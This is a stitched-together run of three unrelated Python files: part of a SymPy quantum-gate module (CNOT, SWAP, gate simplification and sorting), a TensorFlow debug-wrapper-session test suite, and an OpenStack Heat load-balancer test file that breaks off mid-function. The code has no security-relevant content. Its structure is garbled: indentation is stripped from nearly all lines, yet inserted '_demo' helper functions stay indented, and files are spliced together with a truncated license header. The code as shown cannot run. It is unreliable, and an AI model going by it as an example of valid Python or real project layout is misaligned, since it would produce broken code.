def _eval_commutator_TGate(self, other, **hints):
"""[CNOT(i, j), T(i)] == 0."""
return self._eval_commutator_ZGate(other, **hints)
def _eval_commutator_PhaseGate(self, other, **hints):
"""[CNOT(i, j), S(i)] == 0."""
return self._eval_commutator_ZGate(other, **hints)
def _eval_commutator_XGate(self, other, **hints):
"""[CNOT(i, j), X(j)] == 0."""
if self.targets[0] == other.targets[0]:
return Integer(0)
else:
raise NotImplementedError('Commutator not implemented: %r' % other)
def _eval_commutator_CNotGate(self, other, **hints):
"""[CNOT(i, j), CNOT(i,k)] == 0."""
if self.controls[0] == other.controls[0]:
return Integer(0)
else:
raise NotImplementedError('Commutator not implemented: %r' % other)
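# A hedged sketch of turning a CNOT into an explicit matrix; `represent`
# lives outside this module in sympy.physics.quantum.represent:
def _demo_cnot_matrix():
    """CNOT(1, 0) as a 4x4 matrix in the computational (Z) basis."""
    from sympy.physics.quantum.represent import represent
    return represent(CNotGate(1, 0), nqubits=2)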
class SwapGate(TwoQubitGate):
"""Two qubit SWAP gate.
This gate swaps the values of the two qubits.
Parameters
----------
label : tuple
A tuple of the form (target1, target2).
Examples
--------
"""
gate_name = 'SWAP'
gate_name_latex = u'SWAP'
def get_target_matrix(self, format='sympy'):
return matrix_cache.get_matrix('SWAP', format)
def decompose(self, **options):
"""Decompose the SWAP gate into CNOT gates."""
i,j = self.targets[0], self.targets[1]
g1 = CNotGate(i, j)
g2 = CNotGate(j, i)
return g1*g2*g1
def plot_gate(self, circ_plot, gate_idx):
min_wire = int(min(self.targets))
max_wire = int(max(self.targets))
circ_plot.control_line(gate_idx, min_wire, max_wire)
circ_plot.swap_point(gate_idx, min_wire)
circ_plot.swap_point(gate_idx, max_wire)
def _represent_ZGate(self, basis, **options):
"""Represent the SWAP gate in the computational basis.
The following representation is used to compute this:
SWAP = |1><1|x|1><1| + |0><0|x|0><0| + |1><0|x|0><1| + |0><1|x|1><0|
"""
format = options.get('format', 'sympy')
targets = [int(t) for t in self.targets]
min_target = min(targets)
max_target = max(targets)
nqubits = options.get('nqubits',self.min_qubits)
op01 = matrix_cache.get_matrix('op01', format)
op10 = matrix_cache.get_matrix('op10', format)
op11 = matrix_cache.get_matrix('op11', format)
op00 = matrix_cache.get_matrix('op00', format)
eye2 = matrix_cache.get_matrix('eye2', format)
result = None
for i, j in ((op01,op10),(op10,op01),(op00,op00),(op11,op11)):
product = nqubits*[eye2]
product[nqubits-min_target-1] = i
product[nqubits-max_target-1] = j
new_result = matrix_tensor_product(*product)
if result is None:
result = new_result
else:
result = result + new_result
return result
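# A quick sketch of the SWAP decomposition implemented above:
def _demo_swap_decompose():
    """SWAP(0, 1) decomposes into three alternating CNOTs."""
    return SwapGate(0, 1).decompose()  # CNOT(0,1)*CNOT(1,0)*CNOT(0,1)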
# Aliases for gate names.
CNOT = CNotGate
SWAP = SwapGate
#-----------------------------------------------------------------------------
# Represent
#-----------------------------------------------------------------------------
def represent_zbasis(controls, targets, target_matrix, nqubits, format='sympy'):
"""Represent a gate with controls, targets and target_matrix.
This function does the low-level work of representing gates as matrices
in the standard computational basis (ZGate). Currently, we support two
main cases:
1. One target qubit and no control qubits.
2. One target qubit and multiple control qubits.
For the case of multiple controls, we use the following expression [1]:
1_{2**n} + (|1><1|)^{(n-1)} x (target-matrix - 1_{2})
Parameters
----------
controls : list, tuple
A sequence of control qubits.
targets : list, tuple
A sequence of target qubits.
target_matrix : sympy.Matrix, numpy.matrix, scipy.sparse
The matrix form of the transformation to be performed on the target
qubits. The format of this matrix must match that passed into
the `format` argument.
nqubits : int
The total number of qubits used for the representation.
format : str
The format of the final matrix ('sympy', 'numpy', 'scipy.sparse').
Examples
--------
References
----------
[1] http://www.johnlapeyre.com/qinf/qinf_html/node6.html.
"""
controls = [int(x) for x in controls]
targets = [int(x) for x in targets]
nqubits = int(nqubits)
# This checks for the format as well.
op11 = matrix_cache.get_matrix('op11', format)
eye2 = matrix_cache.get_matrix('eye2', format)
# Plain single qubit case
if len(controls) == 0 and len(targets) == 1:
product = []
bit = targets[0]
# Fill product with [I1, Gate, I2] such that the identity matrices,
# I, cause the gate to be applied to the correct qubit
if bit != nqubits-1:
product.append(matrix_eye(2**(nqubits-bit-1), format=format))
product.append(target_matrix)
if bit != 0:
product.append(matrix_eye(2**bit, format=format))
return matrix_tensor_product(*product)
# Single target, multiple controls.
elif len(targets) == 1 and len(controls) >= 1:
target = targets[0]
# Build the non-trivial part.
product2 = []
for i in range(nqubits):
product2.append(matrix_eye(2, format=format))
for control in controls:
product2[nqubits-1-control] = op11
product2[nqubits-1-target] = target_matrix - eye2
return matrix_eye(2**nqubits, format=format) +\
matrix_tensor_product(*product2)
# Multi-target, multi-control is not yet implemented.
else:
raise NotImplementedError(
'The representation of multi-target, multi-control gates '
'is not implemented.'
)
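# A hedged sketch of calling the low-level helper above directly, using
# the module's matrix_cache for the target matrix:
def _demo_represent_zbasis():
    """X on qubit 0 of a 2-qubit register as a 4x4 matrix (no controls)."""
    x = matrix_cache.get_matrix('X', 'sympy')
    return represent_zbasis([], [0], x, 2, format='sympy')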
#-----------------------------------------------------------------------------
# Gate manipulation functions.
#-----------------------------------------------------------------------------
def gate_simp(circuit):
"""Simplifies gates symbolically
It first sorts gates using gate_sort. It then applies basic
simplification rules to the circuit, e.g., XGate**2 = Identity
"""
# Bubble sort out gates that commute.
circuit = gate_sort(circuit)
# Do simplifications by substituting a simplification into the first
# element which can be simplified. We recursively call gate_simp with the
# new circuit as input while more simplifications exist.
if isinstance(circuit, Add):
return sum(gate_simp(t) for t in circuit.args)
elif isinstance(circuit, Mul):
circuit_args = circuit.args
elif isinstance(circuit, Pow):
b, e = circuit.as_base_exp()
circuit_args = (gate_simp(b)**e,)
else:
return circuit
# Iterate through each element in circuit, simplify if possible.
for i in xrange(len(circuit_args)):
# H,X,Y or Z squared is 1.
# T**2 = S, S**2 = Z
if isinstance(circuit_args[i], Pow):
if isinstance(circuit_args[i].base,
(HadamardGate, XGate, YGate, ZGate))\
and isinstance(circuit_args[i].exp, Number):
# Build a new circuit, replacing the squared
# H,X,Y,Z with the identity.
newargs = (circuit_args[:i] +\
(circuit_args[i].base**(circuit_args[i].exp % 2),) +\
circuit_args[i+1:])
# Recursively simplify the new circuit.
circuit = gate_simp(Mul(*newargs))
break
elif isinstance(circuit_args[i].base, PhaseGate):
# Build a new circuit from the old circuit, splicing
# in the simplification.
newargs = circuit_args[:i]
# Replace PhaseGate**2 with ZGate.
newargs = newargs + (ZGate(circuit_args[i].base.args[0])**\
(Integer(circuit_args[i].exp/2)), circuit_args[i].base**\
(circuit_args[i].exp % 2))
# Append the last elements.
newargs = newargs + circuit_args[i+1:]
# Recursively simplify the new circuit.
circuit = gate_simp(Mul(*newargs))
break
elif isinstance(circuit_args[i].base, TGate):
# Build a new circuit taking all the old elements.
newargs = circuit_args[:i]
# Put a PhaseGate in place of any TGate**2.
newargs = newargs + (PhaseGate(circuit_args[i].base.args[0])**\
Integer(circuit_args[i].exp/2), circuit_args[i].base**\
(circuit_args[i].exp % 2))
# Append the last elements.
newargs = newargs + circuit_args[i+1:]
# Recursively simplify the new circuit.
circuit = gate_simp(Mul(*newargs))
break
return circuit
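# A small sketch of gate_simp in action (self-powers collapse according to
# the rules above):
def _demo_gate_simp():
    """X**2 simplifies to 1; T**2 simplifies to the PhaseGate S."""
    assert gate_simp(XGate(0)*XGate(0)) == Integer(1)
    return gate_simp(TGate(0)*TGate(0))  # -> PhaseGate(0)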
def gate_sort(circuit):
"""Sorts the gates while keeping track of commutation relations
This function uses a bubble sort to rearrange the order of gate
application. Keeps track of Quantum computations special commutation
relations (e.g. things that apply to the same Qubit do not commute with
each other)
circuit is the Mul of gates that are to be sorted.
"""
# Make sure we have an Add or Mul.
if isinstance(circuit, Add):
return sum(gate_sort(t) for t in circuit.args)
if isinstance(circuit, Pow):
return gate_sort(circuit.base)**circuit.exp
elif isinstance(circuit, Gate):
return circuit
if not isinstance(circuit, Mul):
return circuit
changes = True
while changes:
changes = False
circ_array = circuit.args
for i in xrange(len(circ_array)-1):
# Go through each element and switch ones that are in the wrong order
if isinstance(circ_array[i], (Gate, Pow)) and\
isinstance(circ_array[i+1], (Gate, Pow)):
# If we have a Pow object, look at only the base
first_base, first_exp = circ_array[i].as_base_exp()
second_base, second_exp = circ_array[i+1].as_base_exp()
# Use sympy's hash based sorting. This is not mathematical
# sorting, but is rather based on comparing hashes of objects.
# See Basic.compare for details.
if first_base.compare(second_base) > 0:
if Commutator(first_base, second_base).doit() == 0:
new_args = (circuit.args[:i] + (circuit.args[i+1],) +\
(circuit.args[i],) + circuit.args[i+2:])
circuit = Mul(*new_args)
circ_array = circuit.args
changes = True
break
if AntiCommutator(first_base, second_base).doit() == 0:
new_args = (circuit.args[:i] + (circuit.args[i+1],) +\
(circuit.args[i],) + circuit.args[i+2:])
sign = Integer(-1)**(first_exp*second_exp)
circuit = sign*Mul(*new_args)
circ_array = circuit.args
changes = True
break
return circuit
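# A quick sketch of gate_sort: gates on different qubits commute, so they
# may be reordered into sympy's canonical (hash-based) order:
def _demo_gate_sort():
    """Sort a two-gate circuit whose gates act on different qubits."""
    return gate_sort(YGate(1)*XGate(0))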
#-----------------------------------------------------------------------------
# Utility functions
#-----------------------------------------------------------------------------
def random_circuit(ngates, nqubits, gate_space=(X, Y, Z, S, T, H, CNOT, SWAP)):
"""Return a random circuit of ngates and nqubits.
By default, this uses an equally weighted sample of (X, Y, Z, S, T, H,
CNOT, SWAP) gates.
Parameters
----------
ngates : int
The number of gates in the circuit.
nqubits : int
The number of qubits in the circuit.
gate_space : tuple
A tuple of the gate classes that will be used in the circuit.
Repeating gate classes multiple times in this tuple will increase
the frequency they appear in the random circuit.
"""
qubit_space = range(nqubits)
result = []
for i in xrange(ngates):
g = random.choice(gate_space)
if g == CNotGate or g == SwapGate:
qubits = random.sample(qubit_space,2)
g = g(*qubits)
else:
qubit = random.choice(qubit_space)
g = g(qubit)
result.append(g)
return Mul(*result)
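# A minimal sketch of random_circuit (output is random by design):
def _demo_random_circuit():
    """A random 5-gate circuit on 3 qubits, as a Mul of gates."""
    return random_circuit(5, 3)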
def zx_basis_transform(self, format='sympy'):
"""Transformation matrix from Z to X basis."""
return matrix_cache.get_matrix('ZX', format)
def zy_basis_transform(self, format='sympy'):
"""Transformation matrix from Z to Y basis."""
return matrix_cache.get_matrix('ZY', format)
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Framework of debug-wrapped sessions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import shutil
import tempfile
import threading
import numpy as np
from tensorflow.python.client import session
from tensorflow.python.debug.lib import debug_data
from tensorflow.python.debug.wrappers import framework
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
class TestDebugWrapperSession(framework.BaseDebugWrapperSession):
"""A concrete implementation of BaseDebugWrapperSession for test."""
def __init__(self, sess, dump_root, observer, thread_name_filter=None):
# Supply dump root.
self._dump_root = dump_root
# Supply observer.
self._obs = observer
# Invoke superclass constructor.
framework.BaseDebugWrapperSession.__init__(
self, sess, thread_name_filter=thread_name_filter)
def on_session_init(self, request):
"""Override abstract on-session-init callback method."""
self._obs["sess_init_count"] += 1
self._obs["request_sess"] = request.session
return framework.OnSessionInitResponse(
framework.OnSessionInitAction.PROCEED)
def on_run_start(self, request):
"""Override abstract on-run-start callback method."""
self._obs["on_run_start_count"] += 1
self._obs["run_fetches"] = request.fetches
self._obs["run_feed_dict"] = request.feed_dict
return framework.OnRunStartResponse(
framework.OnRunStartAction.DEBUG_RUN,
["file://" + self._dump_root])
def on_run_end(self, request):
"""Override abstract on-run-end callback method."""
self._obs["on_run_end_count"] += 1
self._obs["performed_action"] = request.performed_action
self._obs["tf_error"] = request.tf_error
return framework.OnRunEndResponse()
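# A minimal, hedged sketch of driving the wrapper above outside of a test
# case (mirrors what DebugWrapperSessionTest does below; the dict keys are
# exactly the ones the callbacks mutate):
def _demo_wrapper_usage():
    observer = {"sess_init_count": 0, "request_sess": None,
                "on_run_start_count": 0, "run_fetches": None,
                "run_feed_dict": None, "on_run_end_count": 0,
                "performed_action": None, "tf_error": None}
    dump_root = tempfile.mkdtemp()
    with session.Session() as sess:
        wrapper = TestDebugWrapperSession(sess, dump_root, observer)
        wrapper.run(constant_op.constant(1.0))  # fires on_run_start/_end
    shutil.rmtree(dump_root)
    return observer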
class TestDebugWrapperSessionBadAction(framework.BaseDebugWrapperSession):
"""A concrete implementation of BaseDebugWrapperSession for test.
This class intentionally puts a bad action value in OnSessionInitResponse
and/or in OnRunStartAction to test the handling of such invalid cases.
"""
def __init__(
self,
sess,
bad_init_action=None,
bad_run_start_action=None,
bad_debug_urls=None):
"""Constructor.
Args:
sess: The TensorFlow Session object to be wrapped.
bad_init_action: (str) bad action value to be returned during the
on-session-init callback.
bad_run_start_action: (str) bad action value to be returned during
the on-run-start callback.
bad_debug_urls: Bad URL values to be returned during the on-run-start
callback.
"""
self._bad_init_action = bad_init_action
self._bad_run_start_action = bad_run_start_action
self._bad_debug_urls = bad_debug_urls
# Invoke superclass constructor.
framework.BaseDebugWrapperSession.__init__(self, sess)
def on_session_init(self, request):
if self._bad_init_action:
return framework.OnSessionInitResponse(self._bad_init_action)
else:
return framework.OnSessionInitResponse(
framework.OnSessionInitAction.PROCEED)
def on_run_start(self, request):
debug_urls = self._bad_debug_urls or []
if self._bad_run_start_action:
return framework.OnRunStartResponse(
self._bad_run_start_action, debug_urls)
else:
return framework.OnRunStartResponse(
framework.OnRunStartAction.DEBUG_RUN, debug_urls)
def on_run_end(self, request):
return framework.OnRunEndResponse()
class DebugWrapperSessionTest(test_util.TensorFlowTestCase):
def setUp(self):
self._observer = {
"sess_init_count": 0,
"request_sess": None,
"on_run_start_count": 0,
"run_fetches": None,
"run_feed_dict": None,
"on_run_end_count": 0,
"performed_action": None,
"tf_error": None,
}
self._dump_root = tempfile.mkdtemp()
self._sess = session.Session()
self._a_init_val = np.array([[5.0, 3.0], [-1.0, 0.0]])
self._b_init_val = np.array([[2.0], [-1.0]])
self._c_val = np.array([[-4.0], [6.0]])
self._a_init = constant_op.constant(
self._a_init_val, shape=[2, 2], name="a_init")
self._b_init = constant_op.constant(
self._b_init_val, shape=[2, 1], name="b_init")
self._ph = array_ops.placeholder(dtype=dtypes.float64, name="ph")
self._a = variables.Variable(self._a_init, name="a1")
self._b = variables.Variable(self._b_init, name="b")
self._c = constant_op.constant(self._c_val, shape=[2, 1], name="c")
# Matrix product of a and b.
self._p = math_ops.matmul(self._a, self._b, name="p1")
# Matrix product of a and ph.
self._q = math_ops.matmul(self._a, self._ph, name="q")
# Sum of two vectors.
self._s = math_ops.add(self._p, self._c, name="s")
# Initialize the variables.
self._sess.run(self._a.initializer)
self._sess.run(self._b.initializer)
def tearDown(self):
# Tear down temporary dump directory.
if os.path.isdir(self._dump_root):
shutil.rmtree(self._dump_root)
ops.reset_default_graph()
def testSessionInit(self):
self.assertEqual(0, self._observer["sess_init_count"])
wrapper_sess = TestDebugWrapperSession(self._sess, self._dump_root,
self._observer)
# Assert that on-session-init callback is invoked.
self.assertEqual(1, self._observer["sess_init_count"])
# Assert that the request to the on-session-init callback carries the
# correct session object.
self.assertEqual(self._sess, self._observer["request_sess"])
# Verify that the wrapper session implements the session.SessionInterface.
self.assertTrue(isinstance(wrapper_sess, session.SessionInterface))
self.assertEqual(self._sess.sess_str, wrapper_sess.sess_str)
self.assertEqual(self._sess.graph, wrapper_sess.graph)
self.assertEqual(self._sess.graph_def, wrapper_sess.graph_def)
# Check that the partial_run_setup and partial_run are not implemented for
# the debug wrapper session.
with self.assertRaises(NotImplementedError):
wrapper_sess.partial_run_setup(self._p)
def testInteractiveSessionInit(self):
"""The wrapper should work also on other subclassses of session.Session."""
TestDebugWrapperSession(
session.InteractiveSession(), self._dump_root, self._observer)
def testSessionRun(self):
wrapper = TestDebugWrapperSession(
self._sess, self._dump_root, self._observer)
# Check initial state of the observer.
self.assertEqual(0, self._observer["on_run_start_count"])
self.assertEqual(0, self._observer["on_run_end_count"])
s = wrapper.run(self._s)
# Assert the run return value is correct.
self.assertAllClose(np.array([[3.0], [4.0]]), s)
# Assert the on-run-start method is invoked.
self.assertEqual(1, self._observer["on_run_start_count"])
# Assert the on-run-start request reflects the correct fetch.
self.assertEqual(self._s, self._observer["run_fetches"])
# Assert the on-run-start request reflects the correct feed_dict.
self.assertIsNone(self._observer["run_feed_dict"])
# Assert the file debug URL has led to dump on the filesystem.
dump = debug_data.DebugDumpDir(self._dump_root)
self.assertEqual(7, len(dump.dumped_tensor_data))
# Assert the on-run-end method is invoked.
self.assertEqual(1, self._observer["on_run_end_count"])
# Assert the performed action field in the on-run-end callback request is
# correct.
self.assertEqual(
framework.OnRunStartAction.DEBUG_RUN,
self._observer["performed_action"])
# No TensorFlow runtime error should have happened.
self.assertIsNone(self._observer["tf_error"])
def testSessionInitInvalidSessionType(self):
"""Attempt to wrap a non-Session-type object should cause an exception."""
wrapper = TestDebugWrapperSessionBadAction(self._sess)
with self.assertRaisesRegexp(TypeError, "Expected type .*; got type .*"):
TestDebugWrapperSessionBadAction(wrapper)
def testSessionInitBadActionValue(self):
with self.assertRaisesRegexp(
ValueError, "Invalid OnSessionInitAction value: nonsense_action"):
TestDebugWrapperSessionBadAction(
self._sess, bad_init_action="nonsense_action")
def testRunStartBadActionValue(self):
wrapper = TestDebugWrapperSessionBadAction(
self._sess, bad_run_start_action="nonsense_action")
with self.assertRaisesRegexp(
ValueError, "Invalid OnRunStartAction value: nonsense_action"):
wrapper.run(self._s)
def testRunStartBadURLs(self):
# debug_urls ought to be a list of str, not a str. So an exception should
# be raised during a run() call.
wrapper = TestDebugWrapperSessionBadAction(
self._sess, bad_debug_urls="file://foo")
with self.assertRaisesRegexp(TypeError, "Expected type .*; got type .*"):
wrapper.run(self._s)
def testErrorDuringRun(self):
wrapper = TestDebugWrapperSession(self._sess, self._dump_root,
self._observer)
# No matrix size mismatch.
self.assertAllClose(
np.array([[11.0], [-1.0]]),
wrapper.run(self._q, feed_dict={self._ph: np.array([[1.0], [2.0]])}))
self.assertEqual(1, self._observer["on_run_end_count"])
self.assertIsNone(self._observer["tf_error"])
# Now there should be a matrix size mismatch error.
wrapper.run(self._q, feed_dict={self._ph: np.array([[1.0], [2.0], [3.0]])})
self.assertEqual(2, self._observer["on_run_end_count"])
self.assertTrue(
isinstance(self._observer["tf_error"], errors.InvalidArgumentError))
def testUsingWrappedSessionShouldWorkAsContextManager(self):
wrapper = TestDebugWrapperSession(self._sess, self._dump_root,
self._observer)
with wrapper as sess:
sess.run(self._s)
def testUsingWrappedSessionShouldSupportEvalWithAsDefault(self):
wrapper = TestDebugWrapperSession(self._sess, self._dump_root,
self._observer)
with wrapper.as_default():
foo = constant_op.constant(42, name="foo")
self.assertEqual(42, foo.eval())
self.assertEqual(foo, self._observer["run_fetches"])
def testWrapperShouldSupportSessionClose(self):
wrapper = TestDebugWrapperSession(self._sess, self._dump_root,
self._observer)
wrapper.close()
def testWrapperThreadNameFilterMainThread(self):
wrapper = TestDebugWrapperSession(
self._sess, self._dump_root, self._observer,
thread_name_filter="MainThread")
child_run_output = []
def child_thread_job():
child_run_output.append(wrapper.run(self._b_init))
thread = threading.Thread(name="ChildThread", target=child_thread_job)
thread.start()
self.assertAllClose(self._a_init_val, wrapper.run(self._a_init))
thread.join()
self.assertAllClose([self._b_init_val], child_run_output)
dump = debug_data.DebugDumpDir(self._dump_root)
self.assertEqual(1, dump.size)
self.assertEqual("a_init", dump.dumped_tensor_data[0].node_name)
def testWrapperThreadNameFilterChildThread(self):
wrapper = TestDebugWrapperSession(
self._sess, self._dump_root, self._observer,
thread_name_filter=r"Child.*")
child_run_output = []
def child_thread_job():
child_run_output.append(wrapper.run(self._b_init))
thread = threading.Thread(name="ChildThread", target=child_thread_job)
thread.start()
self.assertAllClose(self._a_init_val, wrapper.run(self._a_init))
thread.join()
self.assertAllClose([self._b_init_val], child_run_output)
dump = debug_data.DebugDumpDir(self._dump_root)
self.assertEqual(1, dump.size)
self.assertEqual("b_init", dump.dumped_tensor_data[0].node_name)
def testWrapperThreadNameFilterBothThreads(self):
wrapper = TestDebugWrapperSession(
self._sess, self._dump_root, self._observer,
thread_name_filter=None)
child_run_output = []
def child_thread_job():
child_run_output.append(wrapper.run(self._b_init))
thread = threading.Thread(name="ChildThread", target=child_thread_job)
thread.start()
self.assertAllClose(self._a_init_val, wrapper.run(self._a_init))
thread.join()
self.assertAllClose([self._b_init_val], child_run_output)
dump = debug_data.DebugDumpDir(self._dump_root, validate=False)
self.assertEqual(2, dump.size)
self.assertItemsEqual(
["a_init", "b_init"],
[datum.node_name for datum in dump.dumped_tensor_data])
def testUsingNonDirectSessionRaisesNotImplementedError(self):
# TODO(cais): Remove this test once tfdbg is integrated with GrpcSession.
fake_non_direct_session = session.Session()
fake_non_direct_session._target = "foo"
with self.assertRaisesRegexp(
NotImplementedError,
r"Non-DirectSession support is not available from TensorFlow Debugger "
r"yet \(sess_str=foo\)"):
TestDebugWrapperSession(
fake_non_direct_session, self._dump_root, self._observer)
if __name__ == "__main__":
googletest.main()
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import mock
from oslo_config import cfg
from heat.common import exception
from heat.common import template_format
from heat.engine.clients.os import nova
from heat.engine.resources.aws.lb import loadbalancer as lb
from heat.engine import rsrc_defn
from heat.tests import common
from heat.tests.openstack.nova import fakes as fakes_nova
from heat.tests import utils
lb_template = '''
{
"AWSTemplateFormatVersion": "2010-09-09",
"Description": "LB Template",
"Parameters" : {
"KeyName" : {
"Description" : "KeyName",
"Type" : "String",
"Default" : "test"
},
"LbFlavor" : {
"Description" : "Flavor to use for LoadBalancer instance",
"Type": "String",
"Default": "m1.heat"
},
"LbImageId" : {
"Description" : "Image to use",
"Type" : "String",
"Default" : "image123"
}
},
"Resources": {
"WikiServerOne": {
"Type": "AWS::EC2::Instance",
"Properties": {
"ImageId": "F17-x86_64-gold",
"InstanceType" : "m1.large",
"KeyName" : "test",
"UserData" : "some data"
}
},
"LoadBalancer" : {
"Type" : "AWS::ElasticLoadBalancing::LoadBalancer",
"Properties" : {
"AvailabilityZones" : ["nova"],
"SecurityGroups": ["sg_1"],
"Instances" : [{"Ref": "WikiServerOne"}],
"Listeners" : [ {
"LoadBalancerPort" : "80",
"InstancePort" : "80",
"Protocol" : "HTTP"
}]
}
}
}
}
'''
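# A small, hedged sketch of how the template above is consumed (mirrors the
# setup done in the tests below):
def _demo_parse_lb_template():
    t = template_format.parse(lb_template)
    return sorted(t['Resources'])  # ['LoadBalancer', 'WikiServerOne']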
class LoadBalancerTest(common.HeatTestCase):
def setUp(self):
super(LoadBalancerTest, self).setUp()
self.fc = fakes_nova.FakeClient()
def test_loadbalancer(self):
t = template_format.parse(lb_template)
s = utils.parse_stack(t)
s.store()
resource_name = 'LoadBalancer'
lb_defn = s.t.resource_definitions(s)[resource_name]
rsrc = lb.LoadBalancer(resource_name, lb_defn, s)
self.patchobject(nova.NovaClientPlugin, '_create',
return_value=self.fc)
initial_md = {'AWS::CloudFormation::Init':
{'config':
{'files':
{'/etc/haproxy/haproxy.cfg': {'content': 'initial'}}}}}
ha_cfg = '\n'.join(['\nglobal', ' daemon', ' maxconn 256',
' stats socket /tmp/.haproxy-stats',
'\ndefaults',
' mode http\n timeout connect 5000ms',
' timeout client 50000ms',
' timeout server 50000ms\n\nfrontend http',
' bind *:80\n default_backend servers',
'\nbackend servers\n balance roundrobin',
' option http-server-close',
' option forwardfor\n option httpchk',
'\n server server1 1.2.3.4:80',
' server server2 0.0.0.0:80\n'])
expected_md = {'AWS::CloudFormation::Init':
{'config':
{'files':
{'/etc/haproxy/haproxy.cfg': {
'content': ha_cfg}}}}}
md = mock.Mock()
md.metadata_get.return_value = copy.deepcopy(initial_md)
rsrc.nested = mock.Mock(return_value={'LB_instance': md})
prop_diff = {'Instances': ['WikiServerOne1', 'WikiServerOne2']}
props = copy.copy(rsrc.properties.data)
props.update(prop_diff)
update_defn = rsrc_defn.ResourceDefinition(rsrc.name, rsrc.type(),
props)
rsrc.handle_update(update_defn, {}, prop_diff)
self.assertIsNone(rsrc.handle_update(rsrc.t, {}, {}))
md.metadata_get.assert_called_once_with()
md.metadata_set.assert_called_once_with(expected_md)
def test_loadbalancer_validate_hchk_good(self):
hc = {
'Target': 'HTTP:80/',
'HealthyThreshold': '3',
'UnhealthyThreshold': '5',
'Interval': '30',
'Timeout': '5'}
rsrc = self.setup_loadbalancer(hc=hc)
rsrc._parse_nested_stack = mock.Mock()
self.assertIsNone(rsrc.validate())
def test_loadbalancer_validate_hchk_int_gt_tmo(self):
hc = {
'Target': 'HTTP:80/',
'HealthyThreshold': '3',
'UnhealthyThreshold': '5',
'Interval': '30',
'Timeout': '35'}
rsrc = self.setup_loadbalancer(hc=hc)
rsrc._parse_nested_stack = mock.Mock()
self.assertEqual(
{'Error': 'Interval must be larger than Timeout'},
rsrc.validate())
def test_loadbalancer_validate_badtemplate(self):
cfg.CONF.set_override('loadbalancer_template', '/a/noexist/x.y',
enforce_type=True)
rsrc = self.setup_loadbalancer()
self.assertRaises(exception.StackValidationFailed, rsrc.validate)
def setup_loadbalancer(self, include_magic=True, cache_data=None, hc=None):
template = template_format.parse(lb_template)
if not include_magic:
del template['Parameters']['KeyName']
del template['Parameters']['LbFlavor']
del template['Parameters']['LbImageId']
if hc is not None:
props = template['Resources']['LoadBalancer']['Properties']
props['HealthCheck'] = hc
self.stack = utils.parse_stack(template, cache_data=cache_data)
resource_name = 'LoadBalancer'
lb_defn = self.stack.t.resource_definitions(self.stack)[resource_name]
return lb.LoadBalancer(resource_name, lb_defn, self.stack)
def test_loadbalancer_refid(self):
rsrc = self.setup_loadbalancer()
self.assertEqual('LoadBalancer', rsrc.FnGetRefId())
def test_loadbalancer_refid_convergence_cache_data(self):
cache_data = {'LoadBalancer': {
'uuid': mock.ANY,
'id': mock.ANY,
'action': 'CREATE',
'status': 'COMPLETE',
'reference_id': 'LoadBalancer_convg_mock'
}}
rsrc = self.setup_loadbalancer(cache_data=cache_data)
self.assertEqual('LoadBalancer_convg_mock', rsrc.FnGetRefId())
def test_loadbalancer_attr_dnsname(self):
rsrc = self.setup_loadbalancer()
rsrc.get_output = mock.Mock(return_value='1.3.5.7')
self.assertEqual('1.3.5.7', rsrc.FnGetAtt('DNSName'))
rsrc.get_output.assert_called_once_with('PublicIp')
def test_loadbalancer_attr_not_supported(self):
rsrc = self.setup_loadbalancer()
for attr in ['CanonicalHostedZoneName',
'CanonicalHostedZoneNameID',
'SourceSecurityGroup.GroupName',
'SourceSecurityGroup.OwnerAlias']:
self.assertEqual('', rsrc.FnGetAtt(attr))
def test_loadbalancer_attr_invalid(self):
rsrc = self.setup_loadbalancer()
self.assertRaises(exception.InvalidTemplateAttribute,
rsrc.FnGetAtt, 'Foo')
def test_child_params_without_key_name(self):
rsrc = self.setup_loadbalancer(False)
self.assertNotIn('KeyName', rsrc.child_params())
def test_child_params_with_key_name(self):
rsrc = self.setup_loadbalancer()
params = rsrc.child_params()
self.assertEqual('test', params['KeyName'])
def test_child_template_without_key_name(self):
rsrc = self.setup_loadbalancer(False)
parsed_template = {
'Resources': {'LB_instance': {'Properties': {'KeyName': 'foo'}}},
'Parameters': {'KeyName': 'foo'}
}
rsrc.get_parsed_template = mock.Mock(return_value=parsed_template)
tmpl = rsrc.child_template()
self.assertNotIn('KeyName', tmpl['Parameters'])
self.assertNotIn('KeyName',
tmpl['Resources']['LB_instance']['Properties'])
def test_child_template_with_key_name(self):
rsrc = self.setup_loadbalancer()
rsrc.get_parsed_template = mock.Mock(return_value='foo')
self.assertEqual('foo', rsrc.child_template())
def test_child_params_with_flavor(self):
rsrc = self.setup_loadbalancer()
params = rsrc.child_params()
self.assertEqual('m1.heat', params['LbFlavor'])
def test_child_params_without_flavor(self):
rsrc = self.setup_loadbalancer(False)
params = rsrc.child_params()
self.assertNotIn('LbFlavor', params)
def test_child_params_with_image_id(self):
rsrc = self.setup_loadbalancer()
params = rsrc.child_params()
self.assertEqual('image123', params['LbImageId'])
def test_child_params_without_image_id(self):
rsrc = self.setup_loadbalancer(False)
params = rsrc.child_params()
self.assertNotIn('LbImageId', params)
def test_child_params_with_sec_gr(self):
rsrc = self.setup_loadbalancer(False)
params = rsrc.child_params()
expected = {'SecurityGroups': ['sg_1']}
self.assertEqual(expected, params)
def test_child_params_default_sec_gr(self):
template = template_format.parse(lb_template)
del template['Parameters']['KeyName']
del template['Parameters']['LbFlavor']
del template['Resources']['LoadBalancer']['Properties'][
'SecurityGroups']
del template['Parameters']['LbImageId']
stack = utils.parse_stack(template)
resource_name = 'LoadBalancer'
